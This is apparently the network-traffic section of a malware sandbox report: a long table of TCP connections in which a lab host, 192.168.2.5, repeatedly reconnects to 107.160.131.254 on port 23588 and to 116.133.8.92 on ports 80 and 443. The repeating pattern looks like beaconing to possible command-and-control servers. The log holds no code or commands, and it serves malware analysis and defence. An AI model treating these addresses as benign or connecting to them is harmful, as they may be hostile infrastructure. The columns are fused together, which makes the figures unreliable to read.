                                                                                                                                          Dec 19, 2024 15:34:30.909631968 CET2358850311107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:30.910878897 CET8050312116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:30.995884895 CET8050312116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:32.273067951 CET8050312116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:32.273165941 CET5031280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:32.277895927 CET50340443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:32.277932882 CET44350340116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:32.278001070 CET50340443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:32.278455019 CET50340443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:32.278465986 CET44350340116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:34.390927076 CET5031123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:34.390974045 CET50340443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:34.391006947 CET5030823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:34.391513109 CET5037123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:34.511305094 CET2358850371107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:34.511435986 CET5037123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:34.511729002 CET5037123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:34.527345896 CET5031280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:34.527693987 CET5037380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:34.529189110 CET5037423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:34.631195068 CET2358850371107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:34.647183895 CET8050312116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:34.647249937 CET5031280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:34.647612095 CET8050373116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:34.647705078 CET5037380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:34.648057938 CET5037380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:34.648636103 CET2358850374107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:34.648694992 CET5037423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:34.649018049 CET5037423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:34.767564058 CET8050373116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:34.768763065 CET2358850374107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:37.014148951 CET8050373116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:37.014303923 CET5037380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:37.030194998 CET50412443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:37.030230045 CET44350412116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:37.030307055 CET50412443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:37.030653954 CET50412443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:37.030672073 CET44350412116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:38.517664909 CET5037423588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:38.518078089 CET5037123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:38.518102884 CET50412443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:38.518321037 CET5043623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:38.629987955 CET5044280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:38.630208969 CET5044323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:38.630565882 CET5037380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:38.637806892 CET2358850436107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:38.641005993 CET5043623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:38.644294977 CET5043623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:38.749500036 CET8050442116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:38.749639034 CET5044280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:38.749670029 CET2358850443107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:38.749733925 CET5044323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:38.750360012 CET5044280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:38.750380993 CET8050373116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:38.750523090 CET5037380192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:38.750665903 CET5044323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:38.766803026 CET2358850436107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:38.869982004 CET8050442116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:38.870385885 CET2358850443107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:40.492660999 CET8050442116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:40.492800951 CET5044280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:40.495779991 CET50470443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:40.495816946 CET44350470116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:40.496042013 CET50470443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:40.496416092 CET50470443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:40.496424913 CET44350470116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:42.517534971 CET50470443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:42.517559052 CET5044323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:42.517591000 CET5043623588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:42.518126965 CET5051023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:42.630270958 CET5044280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:42.630570889 CET5051480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:42.631206989 CET5051523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:42.637681961 CET2358850510107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:42.637782097 CET5051023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:42.637887955 CET5051023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:42.751080036 CET8050514116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:42.751173019 CET5051480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:42.751281977 CET8050442116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:42.751359940 CET5044280192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:42.751437902 CET5051480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:42.751553059 CET2358850515107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:42.751626015 CET5051523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:42.751759052 CET5051523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:42.757447004 CET2358850510107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:42.870965958 CET8050514116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:42.871200085 CET2358850515107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:44.460810900 CET8050514116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:44.460964918 CET5051480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:44.464056015 CET50555443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:44.464095116 CET44350555116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:44.464175940 CET50555443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:44.464451075 CET50555443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:44.464468956 CET44350555116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:46.532641888 CET50555443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:46.532732964 CET5051523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:46.532788992 CET5051023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:46.536479950 CET5059723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:46.651813030 CET5051480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:46.652117968 CET5059980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:46.652461052 CET5060023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:46.947802067 CET2358850597107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:46.947967052 CET5059723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:46.948132992 CET8050599116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:46.948146105 CET2358850600107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:46.948156118 CET8050514116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:46.948210001 CET5059980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:46.948242903 CET5059723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:46.948242903 CET5051480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:46.948416948 CET5060023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:46.948417902 CET5059980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:46.948545933 CET5060023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:47.067919970 CET2358850597107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:47.067945004 CET8050599116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:47.068089008 CET2358850600107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:50.548185110 CET5059723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:50.548218012 CET5059980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:50.548230886 CET5060023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:50.557184935 CET5069023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:50.609566927 CET8050599116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:50.609802008 CET5059980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:50.663269997 CET5069223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:50.677073956 CET2358850690107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:50.677365065 CET5069023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:50.678339005 CET5069480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:50.678437948 CET5069023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:50.782994986 CET2358850692107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:50.783108950 CET5069223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:50.783268929 CET5069223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:50.798013926 CET8050694116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:50.798029900 CET2358850690107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:50.798099995 CET5069480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:50.801126957 CET5069480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:50.903683901 CET2358850692107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:50.920877934 CET8050694116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:54.563153982 CET5069480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:54.563200951 CET5069023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:54.563220978 CET5069223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:54.563935041 CET5081523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:54.678380013 CET5082023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:54.678817987 CET5082180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:54.684781075 CET2358850815107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:54.686794043 CET5081523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:54.687002897 CET5081523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:54.797991991 CET2358850820107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:54.798434019 CET8050821116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:54.798544884 CET5082180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:54.798547983 CET5082023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:54.800615072 CET5082023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:54.800981998 CET5082180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:54.809895992 CET2358850815107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:54.922805071 CET2358850820107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:54.922821999 CET8050821116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:58.581717968 CET5081523588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:58.581764936 CET5082023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:58.581796885 CET5082180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:58.583077908 CET5096223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:58.693402052 CET5096723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:58.693924904 CET5096880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:58.703469992 CET2358850962107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:58.703607082 CET5096223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:58.704050064 CET5096223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:58.813803911 CET2358850967107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:58.813899994 CET5096723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:58.814078093 CET5096723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:34:58.814122915 CET8050968116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:58.814188004 CET5096880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:58.815144062 CET5096880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:34:58.823498964 CET2358850962107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:58.934042931 CET2358850967107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:34:58.934865952 CET8050968116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:00.530720949 CET8050968116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:00.531712055 CET5096880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:00.535295963 CET51059443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:00.535353899 CET44351059116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:00.535453081 CET51059443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:00.535741091 CET51059443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:00.535749912 CET44351059116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:02.594583988 CET5096723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:02.594635010 CET51059443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:02.594994068 CET5096223588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:02.595679045 CET5114823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:02.715390921 CET2358851148107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:02.716872931 CET5114823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:02.731898069 CET5114823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:02.738590002 CET5115823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:02.738789082 CET5096880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:02.739025116 CET5115980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:02.851521015 CET2358851148107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:02.858290911 CET2358851158107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:02.858378887 CET5115823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:02.858628035 CET5115823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:02.858633041 CET8051159116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:02.858691931 CET8050968116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:02.858716011 CET5115980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:02.858772993 CET5096880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:02.858999014 CET5115980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:02.978295088 CET2358851158107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:02.978580952 CET8051159116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:04.602087975 CET8051159116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:04.602169037 CET5115980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:04.604891062 CET51237443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:04.604921103 CET44351237116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:04.605026007 CET51237443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:04.605451107 CET51237443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:04.605463982 CET44351237116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:06.447083950 CET44351237116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:06.447204113 CET51237443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:06.447870016 CET44351237116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:06.447940111 CET51237443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:06.496733904 CET51237443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:06.496746063 CET44351237116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:06.497036934 CET44351237116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:06.498584032 CET51237443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:06.498965025 CET51237443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:06.543332100 CET44351237116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:06.840169907 CET51237443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:06.840239048 CET5115823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:06.840272903 CET5114823588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:06.860713005 CET5133123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:06.980247021 CET2358851331107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:06.980344057 CET5133123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:06.982213974 CET5133123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:06.995687008 CET5133723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:07.001236916 CET5115980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:07.001550913 CET5133880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:07.103698969 CET2358851331107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:07.115890980 CET2358851337107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:07.115978956 CET5133723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:07.116161108 CET5133723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:07.121519089 CET8051159116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:07.121552944 CET8051338116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:07.121594906 CET5115980192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:07.121643066 CET5133880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:07.122026920 CET5133880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:07.235805035 CET2358851337107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:07.241835117 CET8051338116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:08.941135883 CET8051338116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:08.945512056 CET5133880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:08.948713064 CET51452443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:08.948765993 CET44351452116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:08.948843956 CET51452443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:08.949378014 CET51452443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:08.949398994 CET44351452116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:10.856441021 CET44351452116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:10.856623888 CET51452443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:10.859755993 CET51452443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:10.859764099 CET44351452116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:10.870928049 CET51452443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:10.870938063 CET44351452116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:10.989053011 CET5133123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:10.989083052 CET51452443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:10.989135027 CET5133723588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:11.003825903 CET5155323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:11.123553038 CET2358851553107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:11.123694897 CET5155323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:11.125632048 CET5155323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:11.128261089 CET5156123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:11.144340038 CET5133880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:11.144535065 CET5156480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:11.245127916 CET2358851553107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:11.247829914 CET2358851561107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:11.247910023 CET5156123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:11.248106956 CET5156123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:11.264100075 CET8051564116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:11.264192104 CET5156480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:11.264411926 CET5156480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:11.264472961 CET8051338116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:11.264534950 CET5133880192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:11.368402004 CET2358851561107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:11.383941889 CET8051564116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:13.774283886 CET8051564116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:13.774372101 CET5156480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:13.777081966 CET51728443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:13.777131081 CET44351728116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:13.777195930 CET51728443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:13.777592897 CET51728443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:13.777606010 CET44351728116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:15.141197920 CET5156123588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:15.141196966 CET5155323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:15.141298056 CET51728443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:15.142623901 CET5180323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:15.258821964 CET5181023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:15.259609938 CET5156480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:15.259740114 CET5181180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:15.262473106 CET2358851803107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:15.262917042 CET5180323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:15.263513088 CET5180323588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:15.378426075 CET2358851810107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:15.378658056 CET5181023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:15.378885984 CET5181023588192.168.2.5107.160.131.254
                                                                                                                                          Dec 19, 2024 15:35:15.380422115 CET8051564116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:15.380507946 CET8051811116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:15.380608082 CET5181180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:15.380614996 CET5156480192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:15.380764008 CET5181180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:15.383369923 CET2358851803107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:15.498577118 CET2358851810107.160.131.254192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:15.500233889 CET8051811116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:17.090538979 CET8051811116.133.8.92192.168.2.5
                                                                                                                                          Dec 19, 2024 15:35:17.090682030 CET5181180192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:17.093458891 CET51920443192.168.2.5116.133.8.92
                                                                                                                                          Dec 19, 2024 15:35:17.093518019 CET44351920116.133.8.92192.168.2.5
